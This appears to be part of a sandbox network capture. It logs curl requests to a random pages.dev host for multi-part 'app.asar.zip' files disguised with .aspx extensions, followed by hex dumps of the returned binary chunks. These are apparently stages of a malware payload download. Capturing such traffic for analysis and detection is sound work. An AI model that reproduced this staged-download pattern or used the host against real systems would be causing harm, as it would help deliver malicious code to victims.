2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 12 93 0e 5e 2c c0 4d cf de 5f 76 8f 8f bf ab ee 78 87 d0 23 4c 0d 8f eb 8b 4b 95 51 38 94 31 3c 1b 15 d4 b3 05 31 86 84 d4 d1 70 b4 d9 fa a2 82 d5 a1 4c 2a 65 21 90 87 70 9e 83 3e 17 1f ce 0b 4e 0d f0 05 a7 36 79 4d 4e 98 59 ac 83 d7 66 30 91 fb 50 07 08 01 5b 63 36 f8 7a 11 6c bc 73 7f 0b 37 b1 e3 7a 4f 00 a3 f5 e5 50 30 84 48 c3 5a 13 5b ae 35 ac 51 44 0d a2 31 ca 14 77 ea de 78 94 55 02 4a 99 84 44 a5 b5 c3 bc 82 93 03 6c 61 72 77 cd 06 8d 8a 43 12 2e 9a 8b d0 8a 6a 23 47 26 a6 64 bd a3 af af dc 4c 54 6a db a1 f3 88 80 f0 71 99 00 0f 46 60 ac 7d 11 78 d3 de a2 6b 59 d4 73 0e 32 92 75 53 4b 1f 68 60 12 b2 0a d4 81 8c d1 1b c7 10 e9 3a 0f bf 72 27 07 d8 a0 d4 4a e1 de b2 21 25 b5 b1 37 68 a5 d3 ea c9 9d 8b 22 79 3c 39 c9 67 e5 eb ac 27 c6 7a b5 5b a0 05 Data Ascii: ^,M_vx#LKQ81<1pL*e!p>N6yMNYf0P[c6zls7zOP0HZ[5QD1wxUJDlarwC.j#G&dLTjqF`}xkYs2uSKh`:r'J!%7h"y<9g'z[
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 78 f0 f0 ec ee e3 17 4f 5f de bb 73 ff 4f 1f 2e de 5d 39 1d ca 75 87 30 5b 70 c3 f8 3b 8e 31 0b 73 49 af 8c 96 9d de 0e 54 54 78 e1 52 aa 50 29 06 21 b1 62 0e 80 53 27 4b ee 6d 16 56 f7 32 42 70 a3 2b 3c c4 98 3d 31 c0 06 8b 5e 17 d4 65 50 b9 d1 80 a9 35 bc 4a 36 e2 2d 1b 14 6c bc 0a f6 52 f0 5f 71 41 f7 ef 15 4a 81 ee 91 d4 b4 49 80 94 bc b1 82 29 64 95 39 74 38 6a 0f 18 a5 15 1e a5 37 41 6d 5e ad 42 a9 ab 50 58 19 8b 32 4b 5c 76 f8 9e 3d 39 c0 ff da 00 c5 55 95 b0 6a c5 b1 0a 38 ce e8 a4 0b bb af 62 5e 09 9d 7b b0 7c 9d 0c 5a b3 6b ba 8b 93 a9 f0 71 ad 8a 18 83 a3 31 c9 32 ce 7e ef e2 c2 2b 30 15 2b e0 83 54 dd 59 69 64 1d 43 3d e9 76 93 85 8c cb ca f9 a6 1c be 7f 4f 0e b0 c5 e9 43 fc 7a f6 e4 87 9b df 3e fa fe c6 c3 dd cf aa 56 c4 5d c6 7e 91 9a dd b3 Data Ascii: xO_sO.]9u0[p;1sITTxRP)!bS'KmV2Bp+<=1^eP5J6-lR_qAJI)d9t8j7Am^BPX2K\v=9Uj8b^{\|Zkq12~+0+TYidC=vOCz>V]~
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 6a 80 df 40 f8 e1 db 1b f7 6e 3e 7a f9 78 17 04 d2 5d c3 0d 91 96 5c 93 e3 1c 37 aa 2b e0 60 01 2e 65 95 3e 79 86 ae a2 36 70 f5 28 a9 b6 5e cd 9b f9 ac 94 54 16 32 f6 4e 63 43 4a 41 3d ac 12 39 39 c0 3f 41 f8 4b 16 ce 67 df be e1 a7 f7 e8 c5 d3 3d 24 da 8e 3a b4 8a 18 e8 71 3d ba 61 d6 ac 17 02 41 ae e9 c5 e0 24 95 28 29 f0 13 46 e5 25 51 67 87 2a 42 56 5d b2 5b 12 cd 1a b8 35 cd b6 f5 61 ed c7 a9 01 b6 48 fc f2 f7 47 fd e2 f2 f5 d9 2d 79 86 77 f0 d9 f3 74 37 fd f9 8a b0 d1 08 ea 0e c3 2c c1 50 29 47 7d 1b da 83 27 1a 66 cf c2 c5 34 67 33 03 a0 34 07 ad b1 70 a1 d7 bc f6 7b 37 22 65 ed 38 7a 5b 45 a3 8d b2 2a 1d 3e 16 b1 16 1a 52 d5 d2 67 41 05 e3 01 e9 5c 54 c9 7a ea 11 c2 46 78 8b 0e c3 cd 17 92 21 36 ea be 19 db af 8a f9 0c ae 90 d2 3a 79 87 40 9b 3d Data Ascii: j@n>zx]\7+`.e>y6p(^T2NcCJA=99?AKg=$:q=aA$()F%QgBV][5aHG-ywt7,P)G}'f4g34p{7"e8z[E>RgA\TzFx!6:y@=
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 82 d3 a6 98 a4 fb 3f dc 78 a0 4f f7 1a c6 5a 77 46 50 c0 85 8b d6 a3 8e 8b f5 12 41 cd a6 90 81 26 b3 7d 94 06 98 22 92 10 e7 ba 50 0b 56 d4 f4 fb 6b a6 35 5b 63 b4 ea a8 46 9b 59 e2 e1 71 ca a9 01 b6 30 9c 7f fa 47 79 2d b7 5f 3d 7e f0 56 1e ec f5 ce d3 2a 67 0f 0b 6d 47 ee 98 31 aa 1c c3 70 72 36 ab 2b 7a 7e 7c 66 61 34 4b ca ce 19 29 fd 5a 26 42 89 e0 60 6d 29 9d b0 a0 de 83 36 86 4f 07 26 08 a7 06 f8 82 c5 e7 1f e3 e3 f9 c5 bb 1b 9f 7f 3a bf f8 74 79 71 76 eb d9 bd fb 4f f1 cd 5e ff 38 69 d8 bb 88 18 5a 3b ae 65 ea 10 69 ae 15 34 41 43 a9 32 d6 da 11 4c b1 24 8b b7 08 00 eb cc 76 10 5a 0a ab 6b 5d 94 8d 92 ea d5 cb 35 a8 34 27 07 f8 3a 22 cf c2 7f 99 e1 67 af be 7f 7c 47 df de d9 a3 d5 a4 f3 de 1e 30 d2 36 69 d6 f5 6f 59 4b 87 2c 6a b9 3f a3 09 a5 cc Data Ascii: ?xOZwFPA&}"PVk5[cFYq0Gy-_=~V*gmG1pr6+z~\|fa4K)Z&B`m)6O&:tyqvO^8iZ;ei4AC2L$vZk]54':"g\|G06ioYK,j?
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 39 c0 06 89 77 71 71 fe cb 45 dc fc 31 e6 4f 67 6f ef 3c fd f6 ce dd b7 4f 7f 2f 4e c7 9d 64 5f 24 81 3d 6e c1 73 52 d5 81 b0 94 5e d3 5d b3 2d 69 03 60 09 e6 d6 d7 89 1d 6c d8 2a ab 4c c5 18 bd 0e 6e c9 59 16 92 9a 1d e9 c3 e3 a1 93 03 7c 81 e3 f3 5f ce 3f ff e5 f2 e2 2f fd c3 87 f7 f1 97 4f c9 76 38 bb 7f ef fe 9d bb 4f be df 3b 25 a4 3b 86 9d 20 e9 fc 75 9c 32 72 29 ae 91 cc 3f cc 1f ba 8a b5 34 7c 54 c3 49 dc d3 13 5b 70 61 15 1d da 6b 8c 86 d6 88 a0 14 ea 12 d8 07 5d 63 0f ca a9 01 f6 50 79 77 79 f9 ee 7d fc e5 c3 fb fe f7 b3 07 6f 1f 3e b9 f1 f0 d1 5e d3 a0 b1 ec a4 65 a2 29 e0 3f ae c9 cd 65 69 44 0c aa d3 d3 cb 23 4d 8b 48 7b da 39 ae b5 e6 2c 91 eb cc c7 8a 52 ad a7 21 1a 8f e5 82 03 56 03 bf 4e 93 fb d4 00 1b 54 ce df bf ff e5 53 3d bb fd e2 16 Data Ascii: 9wqqE1Ogo<O/Nd_$=nsR^]-i`l*LnY\|_?/Ov8O;%; u2r)?4\|TI[pak]cPywy}o>^e)?eiD#MH{9,R!VNTS=
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 4f 30 9e 9f 7d 7b e3 e5 e3 d7 0f df ec bf 21 b5 f2 6e 17 50 45 a8 1e b7 58 db 90 24 72 45 10 7b 4d 97 ba 35 1a cc 49 b5 b5 f4 74 41 19 81 de 9b 4c 5f 31 62 b3 23 2e bd 1b c2 85 2d 66 1f d7 70 50 39 35 c0 15 1c ee 3c d5 07 af 1e dd db 6b 6f 54 30 de 19 43 aa ea b1 4b a1 73 30 9e 76 d5 29 75 e8 4a 69 64 5d 69 ce dc 3d 35 b3 78 10 9b ab 2e 29 dd c7 e8 8b 8d 29 b5 98 2b 8a 3a 35 dc 58 76 1f 22 c8 9c 18 e0 0a 0c 0f de de fa 5e ee dc 7a be ff 76 00 ea 6e 22 ae ad c9 71 fb 89 ba 97 9e 72 86 15 d3 24 5c 52 fd ac 3d 2b cc 29 18 c9 2c 21 1c 94 0e 37 aa 7d ac a5 e9 eb a7 e8 61 cc bd 5e a3 dd 75 72 80 df 70 f8 d3 5f e9 ec ce bd d7 72 ff ce cb ef f7 f2 6e 46 20 de 4d 2a b2 97 72 dc 84 7e 49 2e 1d a9 30 1c 72 cb 48 6e b9 d5 b2 86 2d 2c bc 9c 3a f4 6e 29 20 92 51 73 a1 Data Ascii: O0}{!nPEX$rE{M5ItAL_1b#.-fpP95<koT0CKs0v)uJid]i=5x.))+:5Xv"^zvn"qr$\R=+),!7}a^urp_rnF M*r~I.0rHn-,:n) Qs
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 5a c0 e8 49 96 9b 89 55 36 39 58 19 02 2a 21 e6 7d 96 f3 dc 52 a7 d2 72 4c a2 bc 42 e9 f9 fb 98 33 df 05 1d 2b fa 8a 96 43 b2 1a c9 81 fe 07 71 f1 f2 43 5c 7c 8a 7e f6 5c 1f de bd fb 48 5e ed dd f8 6d 67 60 9e bf 9a 2a c7 dd f7 2a ab 90 15 eb 6c dd 11 d6 9c 95 09 a4 08 fb 62 e4 b4 3b aa 73 d5 2d f9 50 a7 ae d5 bb cc 54 9b a6 ee 6c b3 24 ed 40 d7 ee d4 00 1b 1c 3e fc 78 79 11 37 2e fc e6 e5 f9 c5 a7 b3 1f de bc 7a f9 90 bf df 17 d8 14 50 dc c7 23 d7 7e 1c e5 bf 3a 9b 97 66 83 cb 40 60 5d d0 4b 5d e4 8d 46 7a b9 ea 12 36 f6 95 5e 4f bd 8c 94 25 5b 55 19 54 97 11 0c bb 86 8f c5 c9 01 b6 78 bc ef 9f d7 e5 c7 9f cf 66 ff dc df 5f be 3b 4b 26 df d9 ed bb 0f 6f 3c 7c f3 64 8f 87 43 50 76 ac 4e 28 f7 92 e3 71 7b ae 57 ba c1 4e 43 03 67 5d 43 4a 34 8e e6 3d c6 6a Data Ascii: ZIU69X!}RrLB3+CqC\\|~\H^mg`*lb;s-PTl$@>xy7.zP#~:f@`]K]Fz6^O%[UTxf_;K&o<\|dCPvN(q{WNCg]CJ4=j
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 74 6a 80 7f a2 f0 0f 2b 91 eb 7e 19 c0 69 2d f0 3f f1 cb d8 8e 27 b6 39 f8 d3 db 37 df dc 7a fe 68 2f 07 6f 8a 7b b7 25 22 d0 71 9a c5 e2 34 22 fd 4d f2 54 4d 17 a5 35 cb d4 74 fa 88 01 3d 6a c9 ad 69 50 8c a5 63 53 f5 39 32 47 92 99 86 ce 13 0e 9b 07 9e 1c 60 83 c6 df 3e 9e 7f 8e 67 3b 8d 30 78 f2 f4 f9 f7 4f f7 69 38 39 9c d9 c5 84 d2 97 fb a8 cf 05 cb cc 05 a8 35 c2 c5 fb 12 1d 04 32 d1 86 2f c9 95 c5 e2 ab cd 08 76 b1 3c f0 39 b0 22 92 14 cd f4 e0 71 0d c3 f0 93 03 7c c1 e4 f2 e2 dd d5 4a ed c5 a3 1b df 7f 47 b0 b7 69 88 6a d9 6d 0d 0a 57 a4 e3 ac e6 57 4d 1b f3 e6 14 b9 59 56 73 f1 61 99 29 8d 02 c3 e5 cb 6a 5f 10 23 54 60 d4 99 2b 65 73 21 bc 53 2d 63 ad f0 6b cc 07 4f 0e f0 bf fe f3 3f b7 fb 05 cf df 7b fe 6d d6 f9 fb f8 94 ff 72 3e 2f 2f 3e fd ee Data Ascii: tj+~i-?'97zh/o{%"q4"MTM5t=jiPcS92G`>g;0xOi8952/v<9"q\|JGijmWWMYVsa)j_#T`+es!S-ckO?{mr>//>

Timestamp	Bytes transferred	Direction	Data
2026-01-14 14:20:32 UTC	155	OUT	GET /app.asar.zip.part2.aspx HTTP/1.1 host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev user-agent: curl/8.7.1 accept: / accept-encoding: identity
2026-01-14 14:20:32 UTC	754	IN	HTTP/1.1 200 OK date: Wed, 14 Jan 2026 14:20:32 GMT content-type: null content-length: 26214400 access-control-allow-origin: * cache-control: public, max-age=0, must-revalidate etag: "c263f01b4c1dcb96c88e151cba4faaec" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff vary: accept-encoding report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Fg3AOz6Ldh8nA81n3%2BI2hVZ1MJfP6h0b%2B0eFB6%2F2JtiDCgSwvViQ6p7baPSHDCUc0bF84gmD%2BHAdepuHZR6C3vqcHg7zDKmmyO%2F2uzP4Z8%2BURcCeBjgqhtLijHumR4t%2FOGQf5k%2FuPmI%3D"}]} nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} server: cloudflare cf-ray: 9bddc64038d9bc47-ZRH alt-svc: h3=":443"; ma=86400
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: b7 f3 85 4d c8 58 c9 55 d5 2a 3c 55 10 cc f0 95 a4 25 4c db be 8e 1d 11 a5 5d 90 12 89 df a6 75 2f f0 46 8e bd 6a 63 da 5e 77 05 85 d3 4f 11 34 ee 99 08 51 77 89 2d af e2 10 83 48 24 b8 a2 1f b3 76 f1 2d 03 d4 1f db 8b ae 01 35 39 ff d2 7e c4 5a 18 a7 27 24 f8 2f c5 80 1a 87 55 83 76 bd 61 27 a6 5f e7 a3 b8 26 42 9e 23 c0 7f 7d a4 29 be ef 80 b0 0b 1e 59 42 02 28 a4 20 2c 71 73 10 ab b2 46 a7 51 8f b6 fc 07 f8 b5 98 65 b9 b8 e3 9f 76 75 85 2f 5d c7 a9 85 7d ba 10 23 60 6f 7c a6 ea 93 e7 4a 6c cf 97 37 c7 00 75 53 80 3c 2b db 38 25 f9 fc 2a d7 92 29 32 fb 28 e1 f8 d3 68 01 f9 4e be a4 4b 37 85 c0 49 64 bd 64 9a 14 89 8f 67 5e 59 d3 e4 57 72 af ee 08 07 73 50 a6 2d e6 24 5f 98 ed 52 10 1e 98 99 26 13 10 a0 1c 37 46 5e 96 18 ef 9c f6 8e 52 ef f7 f1 bd 32 b7 Data Ascii: MXU<U%L]u/Fjc^wO4Qw-H$v-59~Z'$/Uva'_&B#})YB( ,qsFQevu/]}#`o\|Jl7uS<+8%)2(hNK7Iddg^YWrsP-$_R&7F^R2
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: a9 d3 8d 5a 55 b4 c0 4a 8f a4 b1 55 1c 33 0b fc 1f ce 08 6d 20 86 67 7a 66 0b 20 9f a6 8b e8 83 ed b8 44 36 f1 af 66 bb 83 99 b5 7e 3e 61 08 19 bd 8f a2 82 78 b5 99 c3 ec 10 df 54 4c 4b 6c 66 05 59 ea a0 f0 91 98 b5 dc 93 81 93 c5 c5 be be ba c3 73 d2 89 8c 25 90 6a 6f f2 52 de c5 89 66 85 2e b3 94 ba 08 d3 a5 36 b9 02 db ab c3 3f 00 94 cb 0e 49 35 cb 43 82 6c 36 f9 1b cf 45 a8 f6 8b 0a cb 64 b8 48 48 7f 01 be 1a 41 2d dd 63 f5 e0 97 cb 16 5d dd 9f dd c1 bd 26 94 74 46 9f 89 b7 41 d3 f7 be 83 da 07 45 4b 55 af 0a 66 00 e2 71 99 1f ec e6 7c 75 5c 9e cf d3 c3 32 3d 03 1d 7a f7 82 55 fd 29 cb dd 4a 63 50 68 87 32 d6 95 50 28 0c fc 0c 51 9c 99 32 b1 e5 e7 4c 03 86 ad 43 ba 15 b5 8a 10 6e e3 2b 2a 6c 08 52 0b 26 3c 05 08 3d 68 dc dc 3d 98 2e 5e 59 48 24 93 00 Data Ascii: ZUJU3m gzf D6f~>axTLKlfYs%joRf.6?I5Cl6EdHHA-c]&tFAEKUfq\|u\2=zU)JcPh2P(Q2LCn+*lR&<=h=.^YH$
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: e5 62 f9 25 59 67 e4 d7 c2 ee 7a d1 ba 97 7b dc 2a a4 18 6e f4 7d 55 bd e8 e7 d2 62 1f 67 18 50 f0 1f c4 2b 69 b0 7c b5 9a 4a 41 30 17 ab f3 7e d6 47 dc 9f c4 86 5c ff 07 e8 7c 2f 17 a4 ce d0 2a bd 72 c1 59 c4 61 a3 0e fa 2f f7 4b ce e4 4c b9 dd 40 cd 53 dd 3d 9b 58 1e 65 d0 8a 52 2d 31 74 11 83 5f 22 47 35 28 7b fc ef 71 7f 09 b7 bb e2 bb a5 8a b9 6a d1 39 10 e4 fc e6 3c cc 3e a7 68 03 ca f8 2e 38 dd c9 f7 3d 19 51 1b b9 54 4b 7d 94 3f c7 0d 3e 95 2a 3e 48 7c 3d 5e 2a 1c 75 e4 73 d4 8b 4c 2d 07 de 17 5e ff 88 07 a3 f4 83 b8 2b f9 2a 2f 23 18 6a 2b 19 88 20 9c 74 a2 42 cf df b0 68 be 17 c1 4a 78 ce a1 d0 4d 2b 6f 10 35 f2 89 aa a5 cf b1 ed bd 89 93 72 d3 0d 25 2c 1e 8b 21 21 fb ef 24 88 b1 18 5b 9c 2f 36 98 a6 a0 b3 24 bc 5e 6b c8 ec 51 42 4a 44 15 5f 2f Data Ascii: b%Ygz{n}UbgP+i\|JA0~G\\|/rYa/KL@S=XeR-1t_"G5({qj9<>h.8=QTK}?>>H\|=^usL-^+*/#j+ tBhJxM+o5r%,!!$[/6$^kQBJD_/
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: 67 52 82 04 64 e5 47 56 4d a8 26 e0 5a cb ef 34 a5 c6 61 d3 60 49 38 88 2e 2b eb 91 1c 7c 23 cf 69 34 0d ec c2 a9 ce d1 ad ed 31 81 c2 de dd 5e 73 a0 a6 1c 63 5a 62 ff 7c a7 f4 83 60 e2 c5 95 92 d6 98 77 77 9d 8d 3b 58 f7 b2 42 fc c3 71 56 99 fa a1 ba 72 25 98 49 b3 05 36 ab 3b 6b 0f 04 2f c2 a9 6c fe 40 d8 cb 81 07 44 df fd 2d 2a bd 78 44 f4 57 c0 8f 8a 99 54 b2 63 ee c1 03 d6 53 95 c2 d3 7b fb 80 67 90 0b 8d 3c 4e 4b e8 ca dc 6c 8f 1b 9a c1 03 0a 85 15 cc e4 59 f3 7a d9 ea 53 dc 75 82 ad 95 2c 98 f7 37 a5 e2 88 54 52 36 1d 72 bc a0 c4 7e 0b 7e 65 2e c5 ad 89 d9 58 fd f4 bc c8 65 10 25 d1 00 b6 e6 61 55 06 42 ea 28 78 c6 22 7a 6b 2e 09 b8 c3 63 bc 62 04 09 9f 2a c6 4a f1 55 82 9d e3 b5 eb bb a5 c5 3c cf 32 ad 56 01 05 29 b8 8f 97 af 9e 36 dc cb 59 57 cc Data Ascii: gRdGVM&Z4a`I8.+\|#i41^scZb\|`ww;XBqVr%I6;k/l@D-xDWTcS{g<NKlYzSu,7TR6r~~e.Xe%aUB(x"zk.cbJU<2V)6YW
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: cb 12 27 2a fe 09 af b9 a7 e8 85 2f 77 7f ae f5 aa db 0f a9 b0 6b e5 90 b7 f6 09 7a 1e d6 79 5d ce 89 1f 35 b2 99 ea f3 63 73 4b 4f ad 84 a1 a8 78 fa 75 d4 9a a3 91 8d 64 a4 e4 85 21 be 7d 83 53 97 1f 70 b0 f7 57 83 eb f2 ed b2 d8 33 f2 f4 c2 55 63 e8 28 e8 17 f0 22 cc 99 a8 50 e0 4d 6e 94 62 77 8a fe 53 2b 44 7b 56 3b 76 c8 b3 c5 d8 db 83 3c cc 0f 63 63 ca d6 e1 d1 b9 ae 19 f1 c7 88 71 dc 19 1a 8e 03 72 e5 d3 81 2e 85 1a c4 15 b4 db 31 9a 1b ba c6 84 38 ba a8 f7 98 69 67 d0 0b be 46 65 48 f5 e8 a8 6a 40 f3 80 8f fd 8b 87 54 f4 6d 90 f0 26 a9 6f 2b 89 54 76 94 c2 d6 32 e2 a8 ec b6 1d 29 aa d8 84 26 a2 73 28 72 2d 41 97 ab 80 e4 d8 58 a3 87 fc 9b ad 5b c0 ec 06 95 2d cd 82 94 23 3b 55 24 18 df d8 ef c1 57 17 80 bd a7 73 cb 0f c8 f1 5c 8b b3 a7 e5 01 13 b0 Data Ascii: '*/wkzy]5csKOxud!}SpW3Uc("PMnbwS+D{V;v<ccqr.18igFeHj@Tm&o+Tv2)&s(r-AX[-#;U$Ws\
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: f3 14 75 90 e0 49 b0 9f 39 b2 95 6e 21 8e 65 e7 34 65 8d 66 64 00 a7 1c 11 9b e9 f2 e8 91 eb f3 60 83 89 a3 d0 ec 0c 46 40 3c 9a e5 82 3d 8a 07 f2 ff aa eb d6 d1 d7 a9 c1 01 d0 62 35 3b 07 42 98 c8 96 14 b7 ae b3 7b 46 6e 7c ac 75 05 e8 c9 89 27 40 52 8e f8 74 9a 4c 63 42 05 9d 52 43 21 16 01 f3 ce 14 f4 6b d2 4f d2 08 39 4c 7a cc b3 f3 e7 dc fc 06 bc 5f d6 37 20 2e ad 37 a5 d5 4d 9a 28 e7 47 52 3d 40 79 f7 05 22 02 ce 8d 40 af 4c bd 97 c0 52 c2 7f f9 9d 52 75 e3 82 2b 46 20 ae d3 4e 76 34 4e cd 26 e7 05 c1 3f 67 df be c5 d7 41 dc 2c df 05 a0 60 7b 8a 11 10 3b 44 6e 5d 4e c5 e9 9f 5e f7 0d 2b 9b 37 72 1d 43 89 f7 03 14 fc 31 f3 90 4f dc df 83 31 f1 ec db e2 e3 41 4f 7e eb 41 07 6e c3 f6 22 01 bb e6 2d b4 e2 a3 8c f4 90 d9 09 69 72 fd 88 92 e4 64 ae 5c 62 Data Ascii: uI9n!e4efd`F@<=b5;B{Fn\|u'@RtLcBRC!kO9Lz_7 .7M(GR=@y"@LRRu+F Nv4N&?gA,`{;Dn]N^+7rC1O1AO~An"-ird\b
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: 93 0f e8 62 a6 bb da 72 10 b9 84 ab d2 95 a8 07 93 ca dc 7b 01 26 c1 b3 ef 95 05 16 b4 40 41 06 2b 1a 07 54 01 f0 fd 94 c5 4e 00 38 8f d7 fe c6 db 28 c8 d9 c2 9e af 2d a2 df f6 56 fb 7f 8d 95 d5 a9 5b 37 57 2a c4 f0 af 84 ec 65 ca 02 8f 1e e8 7f a6 4f a3 35 b7 a5 11 66 5e cd 7b e8 02 0c 00 3e 1e 37 67 5b 4d 54 d6 42 0f 74 97 78 d4 4e 93 35 36 7a 80 bc 14 93 19 5a 6d 6b 36 45 8b 7e 8b 31 2b ee 47 ec 76 5d bf c5 2b 9c 61 10 59 5d 4e 5b 8c 8b 00 7d 9a 85 70 f5 09 b4 f0 42 fb b2 08 80 cd fc c3 f4 9c 56 c7 a4 ae b7 b8 26 39 03 0e 2b e8 5f 29 ef a0 a3 60 06 0b 9e d6 9f 57 8f 62 b7 74 50 e3 42 e3 cb 3b 81 d1 49 6e 58 40 b1 d3 98 ef 50 6e a6 08 a5 f1 14 6f 96 67 43 25 bf 6b 18 01 27 4f 0e e0 cc 0f 6f ec 8b 87 66 33 ac db ce 70 94 1c 98 a4 f0 77 61 c7 86 d3 ba d0 Data Ascii: br{&@A+TN8(-V[7W*eO5f^{>7g[MTBtxN56zZmk6E~1+Gv]+aY]N[}pBV&9+_)`WbtPB;InX@PnogC%k'Oof3pwa
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: 89 69 0b 41 37 40 26 04 c5 05 cd 2d eb ad 35 cc ab 10 3a 75 cf 10 4c 4d f6 ce 8c 34 b1 50 14 6e 34 1c ca c3 c3 2f 52 99 52 a1 27 e6 eb a9 db 23 ab 94 c9 1e bb 0a ff 0a ec 95 9d 6f 15 1e e6 e9 60 36 cc 72 87 37 c2 6a 20 8b ce 39 b4 44 ea e7 f4 31 69 63 bc bd 4f db 8e 57 c9 75 66 d5 f8 b7 32 3b 08 b1 ac 27 ab fd 73 c6 b9 e1 90 aa 1a ad 21 5e 05 02 d0 a6 61 71 79 74 44 6c e3 4d e8 82 46 68 32 da ff b8 82 50 1f c1 14 27 2c 48 e6 2a 33 1d 9a 57 a9 4e bf ec 0d 8e 39 30 22 df b1 71 2e 53 83 e6 e1 97 62 5d a9 4b a8 4c 0d ba 73 c5 d4 38 8f 73 ce a4 1a b3 2f a8 f4 b8 bc a4 94 da 3c a5 f2 35 f1 43 cd 89 94 e8 d1 48 96 db 21 4d 71 5d 1b 70 95 6d 62 1c c5 04 bf 33 55 bd 1d 73 ee d5 22 0c 93 6d d5 37 67 35 31 4b 31 18 70 ba f0 74 60 c9 60 ab 6f d6 1e 64 d8 90 74 cf f4 Data Ascii: iA7@&-5:uLM4Pn4/RR'#o`6r7j 9D1icOWuf2;'s!^aqytDlMFh2P',H*3WN90"q.Sb]KLs8s/<5CH!Mq]pmb3Us"m7g51K1pt``odt
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: de a6 d3 35 ff 10 11 36 45 cf 4a 4f 15 40 3a de 73 76 a3 b7 fd 04 df 86 03 ef b3 5c ea a4 36 a5 6b ad 69 93 c5 99 56 8c 5a 46 b7 4b 55 1c 08 be af 0e f8 34 2b b5 af 61 6f 80 7a 86 fd 7d be 72 ba 6e f4 54 22 6e 50 6c 52 42 e4 9b 11 85 0c 36 62 50 08 14 12 5a 52 bf ac c5 6c cd 7e f4 df d3 8d 03 c8 04 37 6b 12 8e ad a7 76 2f 94 e5 46 51 f0 3c 3d 4a 99 6b b7 45 e0 1f cc b8 95 5a 71 aa 2c 5f b3 ad aa 2e 63 fd dc eb b4 f7 f5 d3 37 d7 e3 9b d9 70 48 f1 b1 25 ad d8 47 03 76 dc 61 d4 b1 1b 28 55 e0 f2 6c b9 81 a6 9c ca 75 19 6c 15 5c 22 65 e3 a4 ad 4d 91 9d d0 0c 89 4c d8 80 fd d1 e1 e7 f2 44 aa 98 62 c1 f4 50 f5 e8 fa ce 08 1d 8d 80 d0 52 8f 0a e0 fa bb 3b 5f fc b4 37 76 18 78 c0 c7 79 3c e6 63 c6 05 01 e9 31 ee e6 2e c3 07 b9 07 2e 33 bb 1a 4b 0d 7c 85 1d 0e 98 Data Ascii: 56EJO@:sv\6kiVZFKU4+aoz}rnT"nPlRB6bPZRl~7kv/FQ<=JkEZq,_.c7pH%Gva(Ulul\"eMLDbPR;_7vxy<c1..3K\|
2026-01-14 14:20:32 UTC	1460	IN	Data Raw: 3d dd 1d cd 8c 6b 2b 1c f0 9e b0 66 7e 4b 5c 16 b6 e2 72 24 49 c9 17 54 79 cd 48 56 11 49 2e b6 75 22 b0 bc 91 e7 c9 bf c6 c9 39 0b 8a 07 5a bb bf 49 9b b5 3e 83 6c 2c cd 03 aa c2 7d 96 77 9b 03 14 e7 9d ed 2f e8 21 cb 11 73 f8 77 04 5f c4 94 85 d6 4e 85 49 9e c6 b6 4e a7 7d 4c 1c 5f 67 e7 f6 62 16 70 20 52 8c 7b bd 2c bf 44 86 2e 33 b9 41 8a 4f 51 37 62 9d 07 e9 14 23 4e c5 ec f8 6f 61 67 10 18 88 55 a6 0a 05 81 65 11 29 32 69 90 9f 6f 1f 6b 1f 29 d0 38 5a 49 67 9f 30 b7 83 c1 99 e1 5f 73 be 05 b0 5e a8 c0 c1 7d 14 56 e0 5c e6 46 8f b2 61 68 af c3 79 df 19 a3 2e ae 54 73 fb 77 a7 a3 6f a3 a2 05 ed 39 4c 39 da ac 39 0d 45 50 07 ac 73 bc 0b 29 fd 7d 36 a7 c6 87 a9 b7 9e c1 3f c4 a6 86 c7 7f 55 9a 7e 5e 1d 3d 3b 88 fb e2 c4 60 6a 19 52 85 cf 57 00 92 4a 7e Data Ascii: =k+f~K\r$ITyHVI.u"9ZI>l,}w/!sw_NIN}L_gbp R{,D.3AOQ7b#NoagUe)2iok)8ZIg0_s^}V\Fahy.Tswo9L99EPs)}6?U~^=;`jRWJ~

Timestamp	Bytes transferred	Direction	Data
2026-01-14 14:20:35 UTC	155	OUT	GET /app.asar.zip.part3.aspx HTTP/1.1 host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev user-agent: curl/8.7.1 accept: / accept-encoding: identity
2026-01-14 14:20:35 UTC	741	IN	HTTP/1.1 200 OK date: Wed, 14 Jan 2026 14:20:35 GMT content-type: null content-length: 2259013 access-control-allow-origin: * cache-control: public, max-age=0, must-revalidate etag: "1b6b8bf48957978fd20f638a55e80152" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff vary: accept-encoding report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=POK6Eh6VqhU3jGernu9MsfuTHE6lX5ReLVQ01CzAzw57hVzjwHA2c5yb5UTpwFmGa3I1ocmSEOXleGGy0Z%2FXYmYiYVeWYW7FYsN28k4xu5Q6nqZAj7aB6powlLNMZQ%2Bzi490BlhuCHg%3D"}]} nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} server: cloudflare cf-ray: 9bddc653586bbac6-ZRH alt-svc: h3=":443"; ma=86400
